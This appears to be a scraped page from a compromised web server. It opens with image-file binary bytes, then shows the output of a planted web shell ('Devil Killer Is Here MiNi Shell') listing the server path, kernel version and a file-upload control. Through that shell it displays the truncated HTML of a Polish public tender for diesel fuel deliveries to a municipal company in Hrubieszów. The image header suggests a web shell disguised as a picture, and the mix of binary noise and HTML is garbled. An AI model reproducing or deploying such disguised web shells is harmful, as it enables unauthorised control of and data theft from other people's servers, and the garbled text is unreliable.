JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240515/0032469701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i sukcesywna dostawa oleju napędowego dla potrzeb PGKiM Sp. z o.o. z siedzibą w Hrubieszowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PRZEDSIĘBIORSTWO GOSPODARKI KOMUNALNEJ I MIESZKANIOWEJ SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950288971</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Krucza 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hrubieszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">845353811</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@pgkimhrubieszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.pgkimhrubieszow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i sukcesywna dostawa oleju napędowego dla potrzeb PGKiM Sp. z o.o. z siedzibą w Hrubieszowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f3cfc1de-11d5-11ef-a7f7-6221b72ad4fc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00324697</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f3cfc1de-11d5-11ef-a7f7-6221b72ad4fc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W niniejszym postępowaniu komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia https://ezamowienia.gov.pl<br/>2.	Komunikacja w postępowaniu (przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi) odbywa się drogą elektroniczną za pośrednictwem formularzy dostępnych w zakładce „Formularze” („Formularze do komunikacji”)<br/>3.	Korzystanie z „Formularzy do komunikacji” w pełnym zakresie wymaga konta „Wykonawcy” na Platformie e-Zamówienia<br/>4.	Max. rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB<br/>5.	Min. wymagania techniczne dot. sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dot. specyfikacji połączenia określa Regulamin Platformy e-Zamówienia<br/>6.	W szczególnie uzasadnionych przypadkach Zamawiający dopuszcza komunikację na adres e-mail: przetargi@pgkimhrubieszow.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>2.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>3.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e Zamówienia.<br/>4.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi@pgkimhrubieszow.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	Administratorem Pani/Pana danych osobowych jest Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. z o. o., ul. Krucza 20, 22-500 Hrubieszów.<br/>2.	Może Pani/Pan kontaktować się w sprawach związanych z przetwarzaniem danych oraz z wykonywaniem praw przysługujących na mocy RODO z administratorem z wykorzystaniem powyższych danych teleadresowych lub z wyznaczonym u administratora inspektorem ochrony danych na adres e-mail: iod@pgkimhrubieszow.pl <br/>3.	Pani/Pana dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną przetwarzania jest:<br/>	ustawa z dnia 23 kwietnia 1964 r. Kodeks cywilny (Dz. U 2022 poz. 1360 ze zm.),<br/>	ustawa z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz.U. 2020 poz. 164 ze zm.).<br/>4.	Pani/Pana dane osobowe mogą być udostępniane podmiotom uprawnionym do ich otrzymywania na podstawie przepisów prawa lub umowy, w tym: podwykonawcom, dostawcom usług IT, firmom zapewniającym niszczenie dokumentów i nośników danych, biurom obsługi prawnej, itp.<br/>5.	Ze względu na jawność postępowania o udzielenie zamówienia publicznego, odbiorcami Pani/Pana danych osobowych mogą być wszystkie zainteresowane osoby lub podmioty. Ograniczenie dostępu do danych może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, interesem publicznym lub informacja stanowi tajemnicę przedsiębiorstwa.<br/>6.	W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane mogą być także przekazywane do państw trzecich.<br/>7.	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia. Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekroczy 4 lata, administrator przechowuje dane przez cały okres obowiązywania tej umowy.<br/>8.	Podanie danych osobowych w związku udziałem w postępowaniu o zamówienia publiczne nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału. <br/>9.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>10.	Posiada Pani/Pan:<br/>	prawo dostępu do swoich danych osobowych oraz otrzymania ich kopii;<br/>	prawo do sprostowania (poprawiania) swoich danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia);<br/>	prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej; <br/>	prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego praw; <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO - na adres Biuro Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PGKiM/ZP/01/05/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup i sukcesywna dostawa oleju napędowego spełniającego normę PN-EN 590 w gatunkach B, D, F (oleje dla okresu letniego, przejściowego i zimowego) w ilości szacunkowej 80 000 dm3 do zbiornika magazynującego o pojemności 5 000 litrów dla środków transportu oraz sprzętu stanowiących własność Przedsiębiorstwa Gospodarki Komunalnej i Mieszkaniowej Sp. z o. o. z siedzibą w Hrubieszowie.<br/>2.	Dostarczany olej napędowy musi spełniać wszystkie wymagania jakościowe określone wymaganiami prawnymi obowiązującymi w Polsce, tj. w szczególności: <br/>2.1.	Ustawą z dnia 25 sierpnia 2006 r. o systemie monitorowania i kontrolowania jakości paliw (Dz.U. z 2023 r., poz. 846 z późn. zm.);<br/>2.2. Rozporządzeniem Ministra Klimatu i Środowiska z dnia 28 maja 2021 r. w sprawie wymagań jakościowych dla gazu skroplonego (LPG) (Dz. U. z 2021, poz. 1293 z późn.zm.);<br/>2.3. Rozporządzeniem Ministra Aktywów Państwowych z dnia 27 listopada 2019 r. w sprawie szczegółowego wykazu paliw ciekłych, których wytwarzanie, magazynowanie lub przeładunek, przesyłanie lub dystrybucja, obrót, w tym obrót z zagranicą, wymaga koncesji oraz których przywóz wymaga wpisu do rejestru podmiotów przywożących (Dz.U. 2021, poz. 2336 z późn. zm);<br/>2.4.	Rozporządzeniem Ministra Gospodarki z dnia 9 października 2015 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. 2023, 1314);<br/>2.5.	Normą PN-EN 590:2013-12;<br/>2.6.	Dodatkowo, dostarczany olej napędowy musi być zgodny z nowelizowanymi w trakcie dostaw normami i przepisami określającymi wymagania jakościowe obowiązujące na dzień dostawy.<br/>3.	Szacunkowa ilość przedmiotu zamówienia - 80 000 dm3.<br/>4.	Zamawiający, w trakcie trwania umowy będzie dokonywał zamówień częściowych dostaw oleju napędowego, wg jego bieżących potrzeb.<br/>5.	Jednorazowa wielkość dostawy będzie mieściła się w przedziale od 3 000 dm3 do 5 000 dm3, w zależności od bieżącego zapotrzebowania Zamawiającego. <br/>6.	Wielkość zamówienia została określona szacunkowo na zapotrzebowania w czasie 12 miesięcy poprzedzających ustalenie wielkości zamówienia. Rzeczywisty zakres zamówienia może ulec zmianie i będzie określony na podstawie faktycznej ilości dostarczonego paliwa, jednakże w okresie obowiązywania umowy nie przekroczy on ilości wskazanej w ust. 3 (lub może przekroczyć o np. 20%) i nie będzie mniejszy niż 80% szacowanej ilości zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09134100-8 - Olej napędowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje skorzystanie z prawa opcji w trakcie realizacji zamówienia polegającego na zwiększeniu wielkości dostaw paliwa objętego zamówieniem. Maksymalna wielkość opcji, z której Zamawiający uprawniony będzie skorzystać w okresie obowiązywania Umowy wynosi nie więcej niż 20% ilości dostaw. <br/>2.	Zamawiający powiadomi Wykonawcę o skorzystaniu z prawa opcji e-mailem lub w formie pisemnej z uprzedzeniem co najmniej 5-dniowym, informując o wielkości dostawy objętych dostawą opcjonalną. Dostawa oleju napędowego realizowana w ramach uruchomionego prawa opcji będzie wykonywana według zasad określonych w Umowie dla zamówienia podstawowego po cenach ustalonych w sposób określony w Umowie. Wykonawca nie może odmówić realizacji prawa opcji, jeśli Zamawiający skorzysta z tego uprawnienia. Wykonawca nie może domagać się od Zamawiającego uruchomienia prawa opcji ani dochodzić odszkodowania z powodu nie skorzystania z tego prawa przez Zamawiającego.<br/>3.	Zamawiający jednocześnie zastrzega, że zakup paliwa objętego zamówieniem będzie realizowany w ilościach zależnych od potrzeb Zamawiającego. Zamawiający przewiduje zmniejszenie zakresu zamówienia względem szacowanej ilości oleju napędowego, przy czym ograniczenie to nie przekroczy 80% ilości paliw, o której mowa w § 1 ust. 4 Umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który nie podlega wykluczeniu z udziału w postępowaniu, spełnia warunki udziału w postępowaniu oraz uzyska największą liczbę punktów przyznanych w ramach kryterium cena. <br/>2. Jeżeli Zamawiający nie będzie mógł dokonać wyboru oferty najkorzystniejszej ze względu na to, że zostały złożone oferty o takiej samej cenie, wówczas Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w określonym przez Zamawiającego terminie ofert dodatkowych. Cena oferty dodatkowej nie może być wyższa niż zaoferowana cena z ofercie złożonej. <br/>3. Sposób wyliczenia punktacji dla kryterium Cena <br/>Liczba punktów = [Najniższa zaoferowana cena brutto z ofert niepodlegających odrzuceniu / Cena brutto badanej oferty] * 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1.	nie podlegają wykluczeniu z postępowania - warunek zostanie spełniony, gdy Wykonawca złoży wraz z ofertą oświadczenie zgodne z wzorem stanowiącym załącznik nr 3 do SWZ;<br/>1.2.	spełniają warunki udziału w postępowaniu - warunek zostanie spełniony, gdy Wykonawca złoży wraz z ofertą oświadczenie zgodne z wzorem stanowiącym załącznik nr 2 do SWZ;<br/>2.	Zamawiający, na podstawie art. 112 ustawy PZP, określa następujące warunki udziału w postępowaniu, dotyczące:<br/>2.1.	Zdolności do występowania w obrocie gospodarczym – nie dotyczy.<br/>2.2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej - Wykonawca spełni warunek, jeżeli wykaże się posiadaniem aktualnej koncesji na prowadzenie działalności w zakresie objętym zamówieniem, czyli, na obrót paliwami ciekłymi w szczególności olejami napędowymi o kodach CN: 2710 19 43, 2710 20 11 wydaną przez Prezesa Urzędu Regulacji Energetyki. W przypadku, gdy dotychczasowa koncesja wygasa po terminie związania ofertą lub w okresie realizacji przedmiotu zamówienia, Wykonawca pisemnie poinformuje Zamawiającego o uzyskaniu nowej koncesji w terminie 7 dni kalendarzowych od daty jej otrzymania. <br/>Warunek będzie weryfikowany dwuetapowo - na etapie składania ofert na podstawie oświadczenia zgodnego z wzorem stanowiącym załącznik nr 2 do SWZ, natomiast od Wykonawcy, którego oferta została najwyżej oceniona na podstawie przedłożonego dokumentu Koncesji lub oświadczenia składanego na wzorze zgodnie z załącznikiem nr 10 do SWZ.<br/>2.3.	Sytuacji ekonomicznej lub finansowej – nie dotyczy.<br/>2.4.	Zdolności technicznej lub zawodowej - Wykonawca spełni warunek, jeżeli wykaże, że:<br/>nie wcześniej niż w okresie ostatnich trzech lat, a jeżeli okres działalności jest krótszy - w tym okresie, zrealizował bądź realizuje w sposób należyty co najmniej 2 kontrakty dostawy oleju napędowego o wartości nie mniejszej niż 150 000,00 zł netto każdy. W przypadku kontraktów wykonywanych, dla spełnienia warunku poziom wykonania powinien wynosić min. 150 000,00 zł netto.<br/>Warunek będzie weryfikowany dwuetapowo - na etapie składania ofert na podstawie oświadczenia zgodnego z wzorem stanowiącym załącznik nr 2 do SWZ, natomiast od Wykonawcy, którego oferta została najwyżej oceniona Zamawiający zażąda przedłożenia wykazu wykonanych/wykonywanych dostaw zgodnego z wzorem stanowiącym załącznik nr 6 do SWZ oraz dokumentów potwierdzających ich należyte wykonanie tj. np. referencji, protokołów zdawczo-odbiorczych itp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Oświadczenie wykonawcy dotyczące przesłanek wykluczenia z postępowania - Załącznik nr 3 do SWZ; <br/>2.	Oświadczenie wykonawcy w sprawie przynależności do grypy kapitałowej - Załącznik nr 4 do SWZ; <br/>3.	Oświadczenie dot. przesłanek wykluczenia z art. 5k rozporządzenia 833/2014- Załącznik Nr 8 do SWZ; <br/>4.	Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP – Załącznik Nr 9 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Oświadczenie wykonawcy dot. spełniania warunków udziału w postępowaniu – Załącznik Nr 2 do SWZ;<br/>2. Wykaz dostaw zrealizowanych w ciągu ostatnich trzech lat - Załącznik nr 6 do SWZ wraz z dokumentami potwierdzającymi należyte ich wykonanie np. referencje, protokoły zdawczo-odbiorcze;<br/>3. Oświadczenie Wykonawcy o wpisie do rejestru Prezesa URE – Załącznik Nr 10 do SWZ;<br/>4. Zobowiązanie do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia - Załącznik Nr 7 do SWZ (jeśli dotyczy).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Pełnomocnictwo do reprezentowania Wykonawcy bądź Wykonawców wspólnie ubiegających się o udzielenie zamówienia - w przypadku ustanowienia Pełnomocnika.<br/>2.	Pełnomocnictwo do reprezentacji podmiotów występujących wspólnie w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - w przypadku konsorcjum lub spółki cywilnej.<br/>3.	Wykonawca, który polega na zasobach innych podmiotów składa wraz z ofertą oświadczenie podmiotu o udostępnieniu zasobów zgodne z wzorem stanowiącym załącznik nr 7 do SWZ oraz oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu (Załączniki 2, 3 i 8 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania 